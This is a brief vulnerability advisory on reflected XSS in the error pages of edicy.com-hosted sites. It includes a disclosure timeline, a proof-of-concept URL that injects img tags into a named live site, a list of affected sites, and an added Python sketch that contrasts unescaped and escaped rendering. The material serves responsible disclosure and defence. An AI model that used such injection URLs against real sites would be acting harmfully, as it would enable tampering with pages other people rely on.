0. Timeline
0.0 Discovery: 2013.10.22.
0.1.1 Sent First Report: 2013.11.15.
0.1.2 Vendor Response: 2013.11.15 -> "we are going to fix it by the 2013.11.16".
0.1.3 Sent Second Report: 2013.11.27, as the XSS was still there.
0.1.4 Vendor Response: unknown, but they fixed it shortly after the second contact.
0.2 Disclosure: 2013.12.28

1. Background
edicy.com is a closed-source, managed HTML content creation/management solution from Estonia[0].

2. Problem
Sites created with edicy.com have XSS[1] on error pages[2]. At least the HTML img tag works, but iframe and applet do not.

3. Proof of Concept (PoC) Code
3.0 http://edicy site/<img src="url to a nice picture"></img>
3.1 This loads two pictures:
http://kelam.ee/%3Cimg%20src=%22http://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/Tunne_Kelam_07.jpg/220px-Tunne_Kelam_07.jpg%22%3E%3C/img%3E%3Cimg%20src=%22http://shaan.typepad.com/photos/uncategorized/savisaar.gif%22%3E%3C/img%3E
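
The PoC in 3.0 works when an error page echoes the percent-decoded request path without HTML-encoding it. The sketch below is an added example, not edicy.com code (the product is closed source): the template, function names and the example.invalid host are assumptions, and it shows the unencoded rendering beside the encoded one with a regression check.

```python
import html
from urllib.parse import unquote

# Hypothetical error-page template; this only models the behaviour the
# advisory describes, it is not taken from the vendor's code.
TEMPLATE = "<html><body><h1>404</h1><p>Page {path} was not found.</p></body></html>"


def render_404_vulnerable(raw_path: str) -> str:
    """Echo the percent-decoded request path into the page without encoding."""
    return TEMPLATE.format(path=unquote(raw_path))


def render_404_hardened(raw_path: str) -> str:
    """Same page, with the path HTML-encoded before it is placed in the body."""
    return TEMPLATE.format(path=html.escape(unquote(raw_path), quote=True))


def reflects_markup(page: str, marker: str) -> bool:
    """Regression check: True if the marker tag came back as live markup."""
    return f"<{marker}" in page


# Constructed request path in the shape of the PoC in 3.0; example.invalid
# is a placeholder host, not a value from the advisory.
SAMPLE_PATH = "/%3Cimg%20src=%22http://example.invalid/p.jpg%22%3E%3C/img%3E"

if __name__ == "__main__":
    for render in (render_404_vulnerable, render_404_hardened):
        page = render(SAMPLE_PATH)
        print(render.__name__, "reflects <img>:", reflects_markup(page, "img"))
```

The same check can be kept as a test against the real error handler so that a template change cannot reintroduce the unencoded path.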

4. Not an Exhaustive List of Affected Sites
4.0 kelam.ee
4.1 defendec.com
4.2 rmk.ee

5. References
[0] http://www.edicy.com/
[1] https://www.owasp.org/index.php/XSS_in_error_pages
[2] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

APPENDIX - IMAGES
Savisaar+Kelam 01
Savisaar+Kelam 02